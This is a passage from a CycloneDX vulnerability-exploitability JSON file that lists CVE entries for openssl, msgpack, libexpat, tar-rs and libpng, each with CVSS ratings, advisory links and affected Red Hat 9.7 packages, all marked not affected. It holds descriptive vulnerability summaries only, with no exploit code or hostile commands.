"urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-8.el9?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-32284", "ratings": [ { "source": { "name": "ghsa" }, "score": 7.5, "severity": "high", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "description": "The msgpack decoder fails to properly validate the input buffer length when processing truncated fixext data (format codes 0xd4-0xd8). This can lead to an out-of-bounds read and a runtime panic, allowing a denial of service attack.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-32284" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-32284" }, { "url": "https://github.com/golang/vulndb/issues/4513" }, { "url": "https://github.com/shamaton/msgpack" }, { "url": "https://github.com/shamaton/msgpack/issues/59" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32284" }, { "url": "https://pkg.go.dev/vuln/GO-2026-4513" }, { "url": "https://securityinfinity.com/research/shamaton-msgpack-oob-panic-fixext-dos-2026" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-32284" } ], "published": "2026-03-26T20:16:12+00:00", "updated": "2026-03-30T15:16:27+00:00", "affects": [ { "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7", "versions": [ { "version": "21.3.1-1.el9", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-32776", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 6.2, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 476 ], "description": "libexpat before 2.7.5 allows a NULL pointer dereference with empty external parameter entity content.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-32776" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-32776" }, { "url": "https://github.com/libexpat/libexpat/pull/1158" }, { "url": "https://github.com/libexpat/libexpat/pull/1159" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32776" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-32776" } ], "published": "2026-03-16T14:19:44+00:00", "updated": "2026-03-17T15:52:09+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-32777", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "cwes": [ 835 ], "description": "libexpat before 2.7.5 allows an infinite loop while parsing DTD content.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-32777" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-32777" }, { "url": "https://github.com/libexpat/libexpat/issues/1161" }, { "url": "https://github.com/libexpat/libexpat/pull/1159" }, { "url": "https://github.com/libexpat/libexpat/pull/1162" }, { "url": "https://issues.oss-fuzz.com/issues/486993411" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32777" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-32777" } ], "published": "2026-03-16T14:19:44+00:00", "updated": "2026-03-17T15:52:34+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-32778", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "low" }, { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "source": { "name": "photon" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 5.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "cwes": [ 476 ], "description": "libexpat before 2.7.5 allows a NULL pointer dereference in the function setContext on retry after an earlier ouf-of-memory condition.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-32778" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-32778" }, { "url": "https://github.com/libexpat/libexpat/pull/1159" }, { "url": "https://github.com/libexpat/libexpat/pull/1163" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32778" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-32778" } ], "published": "2026-03-16T14:19:44+00:00", "updated": "2026-03-17T15:52:53+00:00", "affects": [ { "ref": "pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.5.0-5.el9_7.1", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/expat@2.5.0-5.el9_7.1?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-33056", "ratings": [ { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "ghsa" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "nvd" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 4.4, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 61 ], "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33056" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33056" }, { "url": "https://github.com/alexcrichton/tar-rs" }, { "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446" }, { "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056" }, { "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html" }, { "url": "https://ubuntu.com/security/notices/USN-8138-1" }, { "url": "https://ubuntu.com/security/notices/USN-8139-1" }, { "url": "https://ubuntu.com/security/notices/USN-8168-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056" } ], "published": "2026-03-20T08:16:11+00:00", "updated": "2026-03-24T16:17:11+00:00", "affects": [ { "ref": "pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.34-9.el9_7", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tar@1.34-9.el9_7?arch=x86_64&distro=redhat-9.7&epoch=2" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-33416", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "high" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 7.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "cwes": [ 416 ], "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. In versions 1.2.1 through 1.6.55, `png_set_tRNS` and `png_set_PLTE` each alias a heap-allocated buffer between `png_struct` and `png_info`, sharing a single allocation across two structs with independent lifetimes. The `trans_alpha` aliasing has been present since at least libpng 1.0, and the `palette` aliasing since at least 1.2.1. Both affect all prior release lines `png_set_tRNS` sets `png_ptr->trans_alpha = info_ptr->trans_alpha` (256-byte buffer) and `png_set_PLTE` sets `info_ptr->palette = png_ptr->palette` (768-byte buffer). In both cases, calling `png_free_data` (with `PNG_FREE_TRNS` or `PNG_FREE_PLTE`) frees the buffer through `info_ptr` while the corresponding `png_ptr` pointer remains dangling. Subsequent row-transform functions dereference and, in some code paths, write to the freed memory. A second call to `png_set_tRNS` or `png_set_PLTE` has the same effect, because both functions call `png_free_data` internally before reallocating the `info_ptr` buffer. Version 1.6.56 fixes the issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-33416" }, { "url": "https://access.redhat.com/errata/RHSA-2026:9693" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-33416" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451805" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451819" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455897" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455901" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455908" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33416" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33636" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5731" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5732" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5734" }, { "url": "https://errata.almalinux.org/9/ALSA-2026-9693.html" }, { "url": "https://errata.rockylinux.org/RLSA-2026:8459" }, { "url": "https://github.com/pnggroup/libpng/commit/23019269764e35ed8458e517f1897bd3c54820eb" }, { "url": "https://github.com/pnggroup/libpng/commit/7ea9eea884a2328cc7fdcb3c0c00246a50d90667" }, { "url": "https://github.com/pnggroup/libpng/commit/a3a21443ed12bfa1ef46fa0d4fb2b74a0fa34a25" }, { "url": "https://github.com/pnggroup/libpng/commit/c1b0318b393c90679e6fa5bc1d329fd5d5012ec1" }, { "url": "https://github.com/pnggroup/libpng/pull/824" }, { "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-m4pc-p4q3-4c7j" }, { "url": "https://linux.oracle.com/cve/CVE-2026-33416.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2026-9693.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33416" }, { "url": "https://ubuntu.com/security/notices/USN-8251-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-33416" } ], "published": "2026-03-26T17:16:38+00:00", "updated": "2026-04-02T20:28:33+00:00", "affects": [ { "ref": "pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2", "versions": [ { "version": "2:1.6.37-12.el9_7.2", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libpng@1.6.37-12.el9_7.2?arch=x86_64&distro=redhat-9.7&epoch=2" }, { "ref": 